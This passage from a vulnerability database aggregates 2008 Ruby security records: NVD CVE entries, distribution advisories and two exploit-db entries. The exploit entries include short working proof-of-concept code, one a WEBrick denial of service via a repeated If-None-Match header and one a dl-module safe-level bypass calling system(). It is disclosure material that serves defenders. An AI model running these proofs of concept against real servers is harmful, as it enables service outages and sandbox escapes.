"cpe:/a:ruby-lang:ruby:1.6.8", "cpe:/a:ruby-lang:ruby:1.8.6", "cpe:/a:ruby-lang:ruby:1.8.5", "cpe:/a:ruby-lang:ruby:1.8.7", "cpe:/a:ruby-lang:ruby:1.8.0"], "id": "CVE-2008-3905", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3905", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.6:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.9:r18423:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p71:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview2:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview1:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p114:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p286:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p17:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p36:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p111:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:preview3:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.5:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:p22:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p230:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:p110:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7:preview4:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.6:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:21", "description": "Directory traversal vulnerability in WEBrick in Ruby 1.8 before 1.8.5-p115 and 1.8.6-p114, and 1.9 through 1.9.0-1, when running on systems that support backslash (\\) path separators or case-insensitive file names, allows remote attackers to access arbitrary files via (1) \"..%5c\" (encoded backslash) sequences or (2) filenames that match patterns in the :NondisclosureName option.", "edition": 5, "cvss3": {}, "published": "2008-03-04T23:44:00", "title": "CVE-2008-1145", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-1145"], "modified": "2018-10-11T20:29:00", "cpe": ["cpe:/a:webrick:webrick:1.8_p115", "cpe:/a:webrick:webrick:1.9_1", "cpe:/a:webrick:webrick:1.8_p114", "cpe:/a:webrick:webrick:1.8", "cpe:/a:webrick:webrick:1.9"], "id": "CVE-2008-1145", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1145", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:webrick:webrick:1.9:*:*:*:*:*:*:*", "cpe:2.3:a:webrick:webrick:1.8_p114:*:*:*:*:*:*:*", "cpe:2.3:a:webrick:webrick:1.8_p115:*:*:*:*:*:*:*", "cpe:2.3:a:webrick:webrick:1.9_1:*:*:*:*:*:*:*", "cpe:2.3:a:webrick:webrick:1.8:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-08T23:39:57", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-1447", "CVE-2008-3443", "CVE-2008-2376", "CVE-2008-3657", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "Akira Tagoh discovered a vulnerability in Ruby which lead to an integer \noverflow. If a user or automated system were tricked into running a \nmalicious script, an attacker could cause a denial of service or \npossibly execute arbitrary code with the privileges of the user \ninvoking the program. (CVE-2008-2376)\n\nLaurent Gaffie discovered that Ruby did not properly check for memory \nallocation failures. If a user or automated system were tricked into \nrunning a malicious script, an attacker could cause a denial of \nservice. (CVE-2008-3443)\n\nKeita Yamaguchi discovered several safe level vulnerabilities in Ruby. \nAn attacker could use this to bypass intended access restrictions. \n(CVE-2008-3655)\n\nKeita Yamaguchi discovered that WEBrick in Ruby did not properly \nvalidate paths ending with \".\". A remote attacker could send a crafted \nHTTP request and cause a denial of service. (CVE-2008-3656)\n\nKeita Yamaguchi discovered that the dl module in Ruby did not check \nthe taintness of inputs. An attacker could exploit this vulnerability \nto bypass safe levels and execute dangerous functions. (CVE-2008-3657)\n\nLuka Treiber and Mitja Kolsek discovered that REXML in Ruby did not \nalways use expansion limits when processing XML documents. If a user or \nautomated system were tricked into open a crafted XML file, an attacker \ncould cause a denial of service via CPU consumption. (CVE-2008-3790)\n\nJan Lieskovsky discovered several flaws in the name resolver of Ruby. A \nremote attacker could exploit this to spoof DNS entries, which could \nlead to misdirected traffic. This is a different vulnerability from \nCVE-2008-1447. (CVE-2008-3905)", "edition": 5, "modified": "2008-10-10T00:00:00", "published": "2008-10-10T00:00:00", "id": "USN-651-1", "href": "https://ubuntu.com/security/notices/USN-651-1", "title": "Ruby vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-09T00:27:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3443", "CVE-2008-3790"], "description": "Laurent Gaffie discovered that Ruby did not properly check for memory \nallocation failures. If a user or automated system were tricked into \nrunning a malicious script, an attacker could cause a denial of \nservice. (CVE-2008-3443)\n\nThis update also fixes a regression in the upstream patch previously \napplied to fix CVE-2008-3790. The regression would cause parsing of \nsome XML documents to fail.", "edition": 5, "modified": "2008-12-16T00:00:00", "published": "2008-12-16T00:00:00", "id": "USN-691-1", "href": "https://ubuntu.com/security/notices/USN-691-1", "title": "Ruby vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3905", "CVE-2008-3656"], "description": "\nThe official ruby site reports:\n\nSeveral vulnerabilities in safe level have been discovereds:.\n\nuntrace_var is permitted at safe level 4;\n$PROGRAM_NAME may be modified at safe level 4;\ninsecure methods may be called at safe level 1-3;\nsyslog operations are permitted at safe level 4;\ndl doesn't check taintness, so it could allow attackers\n\t to call dangerous functions.\n\n\n", "edition": 4, "modified": "2010-05-12T00:00:00", "published": "2008-08-08T00:00:00", "id": "C329712A-6B5B-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/c329712a-6b5b-11dd-9d79-001fc61c2a55.html", "title": "ruby -- multiple vulnerabilities in safe level", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-3905", "CVE-2008-3656"], "description": "\nThe official ruby site reports:\n\nWEBrick::HTTP::DefaultFileHandler is faulty of exponential time\n\t taking requests due to a backtracking regular expression in\n\t WEBrick::HTTPUtils.split_header_value.\n\n", "edition": 4, "modified": "2010-05-12T00:00:00", "published": "2008-08-08T00:00:00", "id": "F7BA20AA-6B5A-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/f7ba20aa-6b5a-11dd-9d79-001fc61c2a55.html", "title": "ruby -- DoS vulnerability in WEBrick", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5162", "CVE-2008-1145", "CVE-2008-1447", "CVE-2008-1891", "CVE-2008-2662", "CVE-2008-2663", "CVE-2008-2664", "CVE-2008-2725", "CVE-2008-2726", "CVE-2008-3443", "CVE-2008-3655", "CVE-2008-3656", "CVE-2008-3657", "CVE-2008-3790", "CVE-2008-3905"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2008-10-09T21:35:31", "published": "2008-10-09T21:35:31", "id": "FEDORA:1583020874A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 8 Update: ruby-1.8.6.287-2.fc8", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2007-5162", "CVE-2008-1447", "CVE-2008-1891", "CVE-2008-2662", "CVE-2008-2663", "CVE-2008-2664", "CVE-2008-2725", "CVE-2008-2726", "CVE-2008-3443", "CVE-2008-3655", "CVE-2008-3656", "CVE-2008-3657", "CVE-2008-3790", "CVE-2008-3905"], "description": "Ruby is the interpreted scripting language for quick and easy object-oriented programming. It has many features to process text files and to do system management tasks (as in Perl). It is simple, straight-forward, and extensible. ", "modified": "2008-10-09T21:29:45", "published": "2008-10-09T21:29:45", "id": "FEDORA:44ED1208741", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 9 Update: ruby-1.8.6.287-2.fc9", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:52:34", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2009-1886", "CVE-2009-1904", "CVE-2009-2042", "CVE-2008-3443", "CVE-2009-0642", "CVE-2008-3657", "CVE-2009-0692", "CVE-2008-3905", "CVE-2008-3790", "CVE-2009-1888", "CVE-2008-3656"], "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending an overlong subnet field (CVE-2009-0692). In theory a malicious DHCP server could exploit the flaw to execute arbitrary code as root on machines using dhclient to obtain network settings. Newer distributions (SLES10+, openSUSE) do have buffer overflow checking that guards against this kind of stack overflow though. So actual exploitability is rather unlikely.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "modified": "2009-07-15T16:27:03", "published": "2009-07-15T16:27:03", "id": "SUSE-SA:2009:037", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00003.html", "type": "suse", "title": "remote code execution in dhcp-client", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-03T16:28:31", "description": "Ruby 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS. CVE-2008-3656,CVE-2008-4310. Dos exploits for multiple platform", "published": "2008-08-11T00:00:00", "type": "exploitdb", "title": "Ruby <= 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-4310", "CVE-2008-3656"], "modified": "2008-08-11T00:00:00", "id": "EDB-ID:32222", "href": "https://www.exploit-db.com/exploits/32222/", "sourceData": "source: http://www.securityfocus.com/bid/30644/info\r\n\r\nRuby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:\r\n\r\n- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.\r\n\r\n- An error affecting 'WEBrick::HHTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.\r\n\r\n- A flaw in 'dl' can allow attackers to call unauthorized functions.\r\n\r\nAttackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.\r\n\r\nThese issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable. \r\n\r\n#-- Exploitable Server --\r\n# require 'webrick'\r\n# WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => \"/etc\").start\r\n\r\n#-- Attack --\r\nrequire 'net/http'\r\nres = Net::HTTP.start(\"localhost\", 2000) { |http|\r\n req = Net::HTTP::Get.new(\"/passwd\")\r\n req['If-None-Match'] = %q{meh=\"\"} + %q{foo=\"bar\" } * 100\r\n http.request(req)\r\n}\r\np res\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/32222/"}, {"lastseen": "2016-02-03T16:28:40", "description": "Ruby 1.9 dl Module DL.dlopen Arbitrary Library Access. CVE-2008-3655,CVE-2008-3657. Remote exploits for multiple platform", "published": "2008-08-11T00:00:00", "type": "exploitdb", "title": "Ruby <= 1.9 dl Module DL.dlopen Arbitrary Library Access", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-3655", "CVE-2008-3657"], "modified": "2008-08-11T00:00:00", "id": "EDB-ID:32223", "href": "https://www.exploit-db.com/exploits/32223/", "sourceData": "source: http://www.securityfocus.com/bid/30644/info\r\n \r\nRuby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:\r\n \r\n- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.\r\n \r\n- An error affecting 'WEBrick::HHTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.\r\n \r\n- A flaw in 'dl' can allow attackers to call unauthorized functions.\r\n \r\nAttackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.\r\n \r\nThese issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable. \r\n\r\nrequire 'dl'\r\n$SAFE = 1\r\nh = DL.dlopen(nil)\r\nsys = h.sym('system', 'IP')\r\nuname = 'uname -rs'.taint\r\nsys[uname]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/32223/"}], "gentoo": [{"lastseen": "2016-09-06T19:47:07", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3655", "CVE-2008-2664", "CVE-2008-1447", "CVE-2008-2376", "CVE-2008-2663", "CVE-2008-3657", "CVE-2008-2725", "CVE-2008-2726", "CVE-2008-2662", "CVE-2008-3905", "CVE-2008-3790", "CVE-2008-3656"], "description": "### Background\n\nRuby is an interpreted object-oriented programming language. The elaborate standard library includes an HTTP server (\"WEBRick\") and a class for XML parsing (\"REXML\"). \n\n### Description\n\nMultiple vulnerabilities have been discovered in the Ruby interpreter and its standard libraries. Drew Yao of Apple Product Security discovered the following flaws: \n\n * Arbitrary code execution or Denial of Service (memory corruption) in the rb_str_buf_append() function (CVE-2008-2662).\n * Arbitrary code execution or Denial of Service (memory corruption) in the rb_ary_stor() function (CVE-2008-2663).\n * Memory corruption via alloca in the rb_str_format() function (CVE-2008-2664).\n * Memory corruption (\"REALLOC_N\") in the rb_ary_splice() and rb_ary_replace() functions (CVE-2008-2725).\n * Memory corruption (\"beg + rlen\") in the rb_ary_splice() and rb_ary_replace() functions (CVE-2008-2726).\n\nFurthermore, several other vulnerabilities have been reported: \n\n * Tanaka Akira reported an issue with resolv.rb that enables attackers to spoof DNS responses (CVE-2008-1447).\n * Akira Tagoh of RedHat discovered a Denial of Service (crash) issue in the rb_ary_fill() function in array.c (CVE-2008-2376).\n * Several safe level bypass vulnerabilities were discovered and reported by Keita Yamaguchi (CVE-2008-3655).\n * Christian Neukirchen is credited for discovering a Denial of Service (CPU consumption) attack in the WEBRick HTTP server (CVE-2008-3656).\n * A fault in the dl module allowed the circumvention of taintness checks which could possibly lead to insecure code execution was reported by \"sheepman\" (CVE-2008-3657).\n * Tanaka Akira again found a DNS spoofing vulnerability caused by the resolv.rb implementation using poor randomness (CVE-2008-3905).\n * Luka Treiber and Mitja Kolsek (ACROS Security) disclosed a Denial of Service (CPU consumption) vulnerability in the REXML module when dealing with recursive entity expansion (CVE-2008-3790).\n\n### Impact\n\nThese vulnerabilities allow remote attackers to execute arbitrary code, spoof DNS responses, bypass Ruby's built-in security and taintness checks, and cause a Denial of Service via crash or CPU exhaustion. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Ruby users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-lang/ruby-1.8.6_p287-r1\"", "edition": 1, "modified": "2008-12-16T00:00:00", "published": "2008-12-16T00:00:00", "id": "GLSA-200812-17", "href": "https://security.gentoo.org/glsa/200812-17", "type": "gentoo", "title": "Ruby: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}